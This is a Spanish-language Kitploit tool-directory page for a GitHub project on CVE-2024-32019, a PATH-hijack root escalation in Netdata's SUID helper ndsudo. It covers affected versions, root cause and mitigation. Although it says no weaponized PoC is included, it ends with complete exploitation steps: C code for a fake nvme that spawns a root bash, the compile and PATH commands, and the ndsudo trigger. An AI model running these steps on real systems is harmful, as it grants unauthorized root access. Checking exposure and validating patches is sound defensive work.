Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2024-32019-PoC — Comprueba la exposición a la escalada de privilegios de Netdata ndsudo SUID PATH para CVE-2024-32019 y valida los parches sin explotación weaponizada. | Kitploit
Herramientas/GitHubGitHub/ayub0x7/cve-2024-32019-poc
Herramientas DefensivasEscalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónVirtualización de SeguridadPruebas de Penetración
GitHubayub0x7/cve-2024-32019-poc

cve-2024-32019-PoC

Comprueba la exposición a la escalada de privilegios de Netdata ndsudo SUID PATH para CVE-2024-32019 y valida los parches sin explotación weaponizada.

Ver Repositorio
17hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-32019 — Escalada de privilegios local en ndsudo de Netdata

Resumen

El helper ndsudo de Netdata (instalado con setuid root) restringe qué comandos ejecutará, pero resuelve esos comandos usando el PATH del invocador. En las versiones afectadas, un usuario local puede colocar un binario malicioso antes en el PATH y hacer que ndsudo lo ejecute con privilegios de root. Corregido en Netdata 1.45.3 y 1.45.0-169.

Afectados / Corregidos

  • Afectados: >= 1.44.0-60, < 1.45.0-169 y >= 1.45.0, < 1.45.3 (según el aviso upstream).

  • Corregido: 1.45.3 (estable), 1.45.0-169 (nightly). GitHub

Impacto

Escalada de privilegios local a root en sistemas donde ndsudo está instalado con SUID y el usuario puede invocarlo (habitualmente miembros del grupo netdata). NVDGitHub

Causa raíz (a alto nivel)

  • ndsudo es SUID-root y permite una lista blanca de subcomandos como nvme-list, nvme-smart-log, etc.

  • Llama a ejecutables externos por nombre (p. ej., nvme), que se resuelven mediante PATH en lugar de usar rutas absolutas o una búsqueda segura y fija.

  • Si un directorio escribible aparece antes que las rutas del sistema, un atacante puede introducir un binario de aspecto similar que se ejecutará como root. GitHub

Reproducción / Verificación segura

Este repositorio incluye comprobadores no explotables que:

  • Inspeccionan /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo (o donde esté instalado) en busca de SUID/propiedad.

  • Enumeran el PATH en busca de directorios escribibles anteriores a las rutas comunes del sistema.

  • Confirman la presencia de nombres de subcomandos en la lista blanca que ndsudo podría intentar ejecutar.

  • Opcionalmente ejecutan ndsudo --test <subcommand> para imprimir el comando resuelto sin ejecutarlo (usar con precaución, leer el código primero). GitHub

⚠️ No se incluye ningún PoC armado. Este proyecto es para defensores e investigadores para evaluar la exposición y validar los parches de forma responsable.

Mitigación

  • Actualizar Netdata a 1.45.3 (estable) o 1.45.0-169 (nightly).

  • Como medida de defensa en profundidad, preferir rutas absolutas o un PATH mínimo saneado en helpers SUID; evitar conceder acceso innecesario a ndsudo. GitHubwiz.io

Pasos de explotación

1. Guardar el siguiente código C como nvme.c:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", NULL);
    return 0;
}
2. Compilar el exploit
gcc nvme.c - nvme
3. Configuración del entorno
mkdir -p /tmp/fakebin
mv nvme /tmp/fakebin/
chmod +x /tmp/fakebin/nvme
4. Modificar el PATH
export PATH=/tmp/fakebin:$PATH
5. Comando de explotación
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list

Referencias

  • NVD: CVE-2024-32019. NVD

  • Aviso de Netdata (GHSA-pmhq-4cxq-wj93). GitHub

  • Resumen de Wiz. wiz.io

  • Artículo de Snyk. Vulnerability Guide

  • Listado MITRE/CVE. CVE

Descargar herramienta